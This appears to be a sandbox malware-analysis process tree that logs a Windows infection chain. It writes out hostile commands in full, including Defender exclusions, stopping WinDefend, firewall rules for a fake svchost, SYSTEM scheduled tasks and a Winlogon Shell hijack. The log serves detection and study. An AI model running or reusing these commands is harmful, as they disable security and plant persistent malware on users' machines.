C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\amkldjg4.ylh\GcleanerEU.exe /eufive & exit13⤵PID:6496
C:\Users\Admin\AppData\Local\Temp\amkldjg4.ylh\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\amkldjg4.ylh\GcleanerEU.exe /eufive14⤵PID:2156
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6476
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tevxtqqu.qdv\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:5184
C:\Users\Admin\AppData\Local\Temp\tevxtqqu.qdv\installer.exeC:\Users\Admin\AppData\Local\Temp\tevxtqqu.qdv\installer.exe /qn CAMPAIGN="654"14⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7160
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe & exit13⤵PID:6508
C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exeC:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe14⤵PID:7740
C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe"C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe" -u15⤵PID:940
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Loads dropped DLL
PID:6060
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ttrwv5wq.l3g\gcleaner.exe /mixfive & exit13⤵PID:1860
C:\Users\Admin\AppData\Local\Temp\ttrwv5wq.l3g\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ttrwv5wq.l3g\gcleaner.exe /mixfive14⤵PID:6536
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aysi5tnv.xli\autosubplayer.exe /S & exit13⤵PID:4668
C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe"C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe" /VERYSILENT12⤵PID:9124
C:\Users\Admin\Pictures\Adobe Films\XncyffkwayF4lTgU16i6A8Zi.exe"C:\Users\Admin\Pictures\Adobe Films\XncyffkwayF4lTgU16i6A8Zi.exe"9⤵PID:3404
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 29610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5396
C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe"C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe"9⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:9004
C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe"C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe" -u10⤵PID:6568
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Suspicious use of AdjustPrivilegeToken
PID:5152
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7724
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7716
C:\Users\Admin\Pictures\Adobe Films\UYXncJ1J4Hle8NWjUMq5U4KZ.exe"C:\Users\Admin\Pictures\Adobe Films\UYXncJ1J4Hle8NWjUMq5U4KZ.exe"7⤵PID:6608
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 2768⤵
- Program crash
PID:1052
C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"7⤵PID:6740
C:\Users\Admin\Pictures\Adobe Films\0jQNr3rBaYZ4IKwSbC3yTB8P.exe"C:\Users\Admin\Pictures\Adobe Films\0jQNr3rBaYZ4IKwSbC3yTB8P.exe"7⤵PID:5968
C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"7⤵PID:6788
C:\Users\Admin\Pictures\Adobe Films\7elpvTmw1vT1ONC9ndp6H4va.exe"C:\Users\Admin\Pictures\Adobe Films\7elpvTmw1vT1ONC9ndp6H4va.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1288
C:\Users\Admin\Pictures\Adobe Films\T95LOChSK2FJnZ8sP6x6_E2w.exe"C:\Users\Admin\Pictures\Adobe Films\T95LOChSK2FJnZ8sP6x6_E2w.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4376
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵PID:6584
C:\Users\Admin\Pictures\Adobe Films\e8R37IpGW_6y4VHKwqVXv_JJ.exe"C:\Users\Admin\Pictures\Adobe Films\e8R37IpGW_6y4VHKwqVXv_JJ.exe"7⤵PID:3036
C:\Users\Admin\Pictures\Adobe Films\Bd4X2NxFXA5NEmJKfUAVox3h.exe"C:\Users\Admin\Pictures\Adobe Films\Bd4X2NxFXA5NEmJKfUAVox3h.exe"7⤵
- Executes dropped EXE
PID:6852
C:\Users\Admin\Pictures\Adobe Films\Q_fET_usQo2X_6EmGsXsx62w.exe"C:\Users\Admin\Pictures\Adobe Films\Q_fET_usQo2X_6EmGsXsx62w.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3824
C:\Users\Admin\Pictures\Adobe Films\GmSS5Vhk5wUk9_ol891okFe6.exe"C:\Users\Admin\Pictures\Adobe Films\GmSS5Vhk5wUk9_ol891okFe6.exe"7⤵PID:5984
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 6848⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5824
C:\Users\Admin\Pictures\Adobe Films\HZF5DVkBv1ZqBbYSSg8j3oEv.exe"C:\Users\Admin\Pictures\Adobe Films\HZF5DVkBv1ZqBbYSSg8j3oEv.exe"7⤵
- Executes dropped EXE
PID:6820
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 2808⤵
- Program crash
- Enumerates system info in registry
PID:1584
C:\Users\Admin\Pictures\Adobe Films\CccUqSnvorEDEpUpxK4J3YF5.exe"C:\Users\Admin\Pictures\Adobe Films\CccUqSnvorEDEpUpxK4J3YF5.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5156
C:\Users\Admin\Pictures\Adobe Films\rNJcnZZc_xAGgCmOJGIzn_UI.exe"C:\Users\Admin\Pictures\Adobe Films\rNJcnZZc_xAGgCmOJGIzn_UI.exe"7⤵PID:6316
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵PID:7440
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3472
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:5164
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM8⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Creates scheduled task(s)
- Suspicious use of AdjustPrivilegeToken
PID:5932
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:4308
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal8⤵
- Drops file in Windows directory
PID:5720
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\9⤵PID:9016
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \9⤵PID:7988
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵PID:8824
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵PID:7236
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
PID:5348
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1229427acd4bc167.exe5⤵PID:4192
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed120b6f5c6d562.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3172
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 5245⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:1912
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed126ca6605dbec0399.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
PID:3216
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed128c2773227671b3f.exe5⤵
- Suspicious use of WriteProcessMemory
PID:5016
C:\Windows\SysWOW64\systray.exe"C:\Windows\SysWOW64\systray.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6512
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\ArGiap3960SUZs1dAEDT_gNj.exe"3⤵PID:6056
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵PID:3116
C:\Users\Admin\AppData\Local\Temp\8355.exeC:\Users\Admin\AppData\Local\Temp\8355.exe2⤵
- Suspicious use of SetThreadContext
PID:4468
C:\Users\Admin\AppData\Local\Temp\8355.exeC:\Users\Admin\AppData\Local\Temp\8355.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7540
C:\Users\Admin\AppData\Local\Temp\EA3E.exeC:\Users\Admin\AppData\Local\Temp\EA3E.exe2⤵PID:7384
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 2763⤵
- Program crash
PID:9004
C:\Users\Admin\AppData\Local\Temp\5DD8.exeC:\Users\Admin\AppData\Local\Temp\5DD8.exe2⤵PID:7404
C:\Users\Admin\AppData\Local\Temp\B0AD.exeC:\Users\Admin\AppData\Local\Temp\B0AD.exe2⤵PID:5608
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6492
C:\Users\Admin\AppData\Local\Temp\1CE5.exeC:\Users\Admin\AppData\Local\Temp\1CE5.exe2⤵
- Suspicious use of SetThreadContext
PID:8676
C:\Users\Admin\AppData\Local\Temp\1CE5.exeC:\Users\Admin\AppData\Local\Temp\1CE5.exe3⤵PID:7488
C:\Users\Admin\AppData\Local\Temp\A20F.exeC:\Users\Admin\AppData\Local\Temp\A20F.exe2⤵PID:2440
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3032
C:\Users\Admin\AppData\Local\Temp\D872.exeC:\Users\Admin\AppData\Local\Temp\D872.exe2⤵PID:2312
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5288
C:\Users\Admin\AppData\Local\Temp\9C.exeC:\Users\Admin\AppData\Local\Temp\9C.exe2⤵PID:9072
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9072 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6400
C:\Users\Admin\AppData\Local\Temp\83D7.exeC:\Users\Admin\AppData\Local\Temp\83D7.exe2⤵PID:8552
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com3⤵PID:1916
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6420
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com3⤵PID:8368
C:\Users\Admin\AppData\Local\Temp\25E.exeC:\Users\Admin\AppData\Local\Temp\25E.exe2⤵PID:3376
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /release3⤵PID:8456
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /release4⤵
- Gathers network information
PID:5392
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵PID:5096
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
PID:4616
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵PID:5876
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
PID:6860
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵PID:4768
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
PID:6972
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
PID:4604
C:\Users\Admin\AppData\Local\Temp\72AD.exeC:\Users\Admin\AppData\Local\Temp\72AD.exe2⤵PID:7796
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"3⤵PID:5576
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"4⤵PID:6908
C:\Users\Admin\AppData\Local\chromedrlver.exe"C:\Users\Admin\AppData\Local\chromedrlver.exe"3⤵PID:8240
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"4⤵PID:8056
C:\Users\Admin\AppData\Local\Temp\877E.exeC:\Users\Admin\AppData\Local\Temp\877E.exe2⤵
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System policy modification
PID:2220
C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:4664
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\test.bat"4⤵PID:7148
C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:2144
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\test.bat"4⤵PID:8220
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5968
C:\Windows\system32\sc.exesc stop windefend5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6748
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵PID:6896
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵PID:4356
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force3⤵PID:8828
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force3⤵PID:8228
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵PID:4948
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3016
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6740
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"3⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:7180
C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵PID:8692
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\test.bat"5⤵PID:1252
C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵PID:8112
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\test.bat"5⤵PID:3136
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵PID:1888
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵PID:6232
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2012
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
- Blocklisted process makes network request
PID:9068
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force4⤵PID:5860
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵PID:908
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force4⤵PID:3340
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"4⤵PID:3120
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"4⤵PID:1452
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵PID:4732
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"4⤵PID:6104
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"4⤵PID:1468
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:5364
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force3⤵PID:3212
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6524
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵PID:5944
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force3⤵PID:6484
C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"3⤵PID:6724
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵PID:7104
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"3⤵PID:7660
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Modifies WinLogon for persistence
PID:6908
C:\Users\Admin\AppData\Local\Temp\4C27.exeC:\Users\Admin\AppData\Local\Temp\4C27.exe2⤵PID:8516
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8516 -s 4643⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7332
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8516 -s 4843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6260
C:\Users\Admin\AppData\Local\Temp\7FAC.exeC:\Users\Admin\AppData\Local\Temp\7FAC.exe2⤵PID:8540
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8940
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 460629855e209cd5b16a907274503a56 gT42+laoRUGWqQMp0E2DMg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:2156
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2052
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:5080
C:\Windows\system32\MoNotificationUx.exe%systemroot%\system32\MoNotificationUx.exe /ClearActiveNotifications3⤵PID:6920
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:8060
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed128c2773227671b3f.exeWed128c2773227671b3f.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3436
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed128c2773227671b3f.exeC:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed128c2773227671b3f.exe2⤵
- Executes dropped EXE
PID:5504
C:\Users\Admin\AppData\Local\Temp\is-OAD66.tmp\Wed120b6f5c6d562.tmp"C:\Users\Admin\AppData\Local\Temp\is-OAD66.tmp\Wed120b6f5c6d562.tmp" /SL5="$601E6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1488
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe"C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe" /SILENT2⤵
- Executes dropped EXE
PID:4248
